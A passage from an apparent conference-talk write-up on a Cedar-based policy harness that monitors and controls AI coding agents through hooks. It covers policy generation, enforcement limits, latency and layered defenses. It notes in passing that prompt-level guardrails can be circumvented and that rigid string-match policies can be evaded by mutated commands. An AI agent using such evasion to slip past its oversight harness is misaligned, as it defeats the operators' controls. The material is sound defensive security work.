- Accepts natural-language descriptions of desired policy behaviors (e.g., “block shell injection patterns”) and generates Cedar policy syntax
- Uses Cedar’s built-in formal analysis tools to verify the generated policies for contradictions, vacuous rules, and shadowed subsets before deployment
This approach turns Cedar’s formal analyzability — normally an advantage for static verification — into a practical authoring accelerator. Because Cedar policies can be mechanically checked for correctness, LLM-generated policies are not just guesses; they can be validated against the schema and confirmed free of logical defects before being deployed into the harness.
Stateful Multi-Turn Policies and the Limits of the Current Architecture
Cedar is inherently stateless: each policy evaluation is an independent decision over the current event’s attributes and entity state. The trajectory store and entity store in the harness provide a workaround — by persisting bookkeeping about observed entities and trajectory labels, the system can expose derived attributes (like taint flags) to Cedar at evaluation time, enabling behavior that appears stateful.
However, the team is candid about the limits of this approach. True multi-turn policy logic — reasoning about sequences of events, temporal ordering, or conditions that only become relevant after a specific chain of actions — is not natively supported by Cedar. Temporal linear logic and related formal systems are more expressive foundations for this class of policy, though these remain future directions rather than implemented features.
The multi-agent boundary problem is also explicitly out of scope for the current implementation. The harness focuses on single-agent trajectories. While the control event type provides visibility into sub-agent spawning and agent-to-agent orchestration events, policies that enforce contextual integrity across agent boundaries — preventing one agent from leaking a secret it learned to another agent in the environment — are not yet addressed. This is acknowledged as a meaningful gap for teams operating multi-agent pipelines.
Guardrail Latency and Benchmarking
Every hook interception adds latency to the agent loop. The harness must evaluate Cedar policies, run YARA signatures, and optionally invoke the GPT Safeguards classification model for IFC labels — all synchronously in the hot path of agent execution.
The team has ongoing research into guardrail latency benchmarking: measuring the overhead introduced by each component of the harness and identifying where optimizations are needed to keep the enforcement layer from becoming the bottleneck. This is particularly relevant for before-model hooks in Gemini CLI, where token-level streaming interception can compound latency across a long generation.
Complementarity with Existing Defense Layers
The harness is not a replacement for existing security controls — it is an additive layer. Maisel explicitly positioned it as complementary to:
- Permission systems (e.g., Claude Code’s native bash permission controls) — Cedar can add context-aware conditions that permission systems cannot express, such as allowing a command only when the trajectory is not tainted with a PII label
- Sandbox systems — Sandboxes may be overly restrictive for development workflows; Cedar policies allow finer-grained allow/deny decisions without the all-or-nothing constraint of a sandbox boundary
- Prompt-level guardrails — Unlike instructions in a system prompt, Cedar policies run outside the model and cannot be circumvented by adversarial content in the agent’s context
The open-source release includes both the hook-integrated Cedar policy engine for CLI coding agents (Gemini CLI, Claude Code, Cursor) and a Python library for first-party agent frameworks (LangChain[9], Strands, ADK), making the complementarity practical across both workflow and embedded agent deployment patterns.
Actionable Takeaways
- Treat policy calibration as an iterative process, not a one-time deployment step. Start with a minimal policy set targeting your highest-priority threat patterns (e.g., exfiltration channels, destructive commands), measure the impact on agent utility, and expand coverage incrementally. Use Cedar's formal analysis tools to verify each new policy for contradictions and vacuous rules before it goes into production.
- Use the policy agent over MCP to accelerate Cedar policy authorship at scale. Rather than writing Cedar syntax by hand for every new threat pattern, describe the desired behavior in natural language, let the policy agent generate the Cedar syntax, and validate it programmatically before deployment. This is the only approach that makes policy coverage tractable for large threat surfaces.
- Layer the Cedar harness on top of existing controls rather than replacing them. Keep native permission systems and sandbox boundaries in place; use Cedar to add context-aware conditions (taint labels, trajectory state) that those systems cannot express. This defense-in-depth posture ensures that a gap in one layer does not create a single point of failure.
Common Pitfalls
- Building policies around exact-match string patterns for destructive commands is brittle and exploitable. Attackers and malicious content can trivially mutate command strings to evade rigid pattern matching. Policies should be expressed in terms of entity attributes, sensitivity labels, and trajectory context — not literal string equality — to avoid creating a bypassable allowlist that invites policy hacking.
- Treating Cedar's stateful bookkeeping workaround (entity and trajectory stores) as equivalent to native multi-turn policy logic overstates its capabilities. The entity and trajectory stores expose derived attributes at evaluation time, but they cannot express temporal ordering constraints or event-sequence reasoning natively. Teams building policies that depend on complex causal chains across many turns should evaluate whether temporal linear logic or an alternative formal system is needed rather than stretching Cedar beyond its designed scope.
Conclusion
Matt Maisel’s Cedar policy harness addresses the core gap in coding agent security: prompt-level guardrails operate inside the model’s trust boundary and can be circumvented, while sandboxes and permission systems lack the trajectory context to enforce intent-based restrictions. By modeling the agent’s runtime as a four-event trajectory stream, positioning Cedar as a formally verifiable reference monitor outside the model, and wiring it into the available hook surfaces of Gemini CLI, Claude Code, and Cursor, the harness provides deterministic, attribute-enriched enforcement that none of the existing layers deliver on their own.
The four proof-of-concept demonstrations — from blocking an unconstrained SQL delete to detecting a malicious marketplace skill through YARA signatures — show that the approach works across different agents, different threat patterns, and different policy types, from operational constraints (plan mode file write enforcement) to active attack detection (lethal trifecta). The open challenges — Goldilocks calibration, guardrail latency, multi-turn stateful logic, and multi-agent boundaries — are real, but they represent a known research roadmap rather than fundamental limitations.
For security engineers securing AI development environments, the starting point is the trajectory event model itself: map your agent’s actions to the four event types, identify which hooks are available, and build your Cedar policy coverage from the highest-risk enforcement points outward.
Related topics on this site:
- AI/ML security — broader coverage of machine learning security topics
- coding agent security — talks and analysis focused on securing AI coding assistants
- prompt injection defense — techniques and architectures for neutralizing prompt injection attacks
References & Tools
- OWASP Top 10 for Agentic Applications — OWASP risk framework for large language model and agentic application security. ↩
- Gemini CLI — Google's open-source coding agent with before/after model hooks and token-level streaming for policy interception. ↩
- Claude Code — Anthropic's CLI coding agent; exposes a final agent response notification event as its primary hook surface. ↩
- Cursor — AI coding environment providing granular hook types for MCP tool calls, shell commands, and generic tool calls. ↩
- Cedar Policy Language — Formally analyzable policy language with ABAC support and symbolic contradiction/vacuous-rule detection. ↩
- Model Context Protocol (MCP) — Open protocol for exposing tools and context to LLM agents; used here for policy agent access to Cedar tooling and for Cursor's tool call hooks. ↩
- GPT Safeguards 20B Model — Safety model used for information flow control classification, labeling trajectory event data with sensitivity categories based on policy-provided examples. ↩
- YARA Rules — Signature-based detection framework for identifying malicious patterns in files and command strings; integrated as a guardrail in the Cedar harness. ↩
- LangChain — Python agent framework for which an open-source Cedar policy engine library is available, enabling embedded policy enforcement within framework-based agents. ↩
Questions from the audience
Related deep dives
Kinetic Risk: Securing and Governing Physical AI in the Wild | [un]prompted 2026
Securing Workspace GenAI at Google Speed | [un]prompted 2026
The AI Security Larsen Effect - How to Stop the Feedback Loop | [un]prompted 2026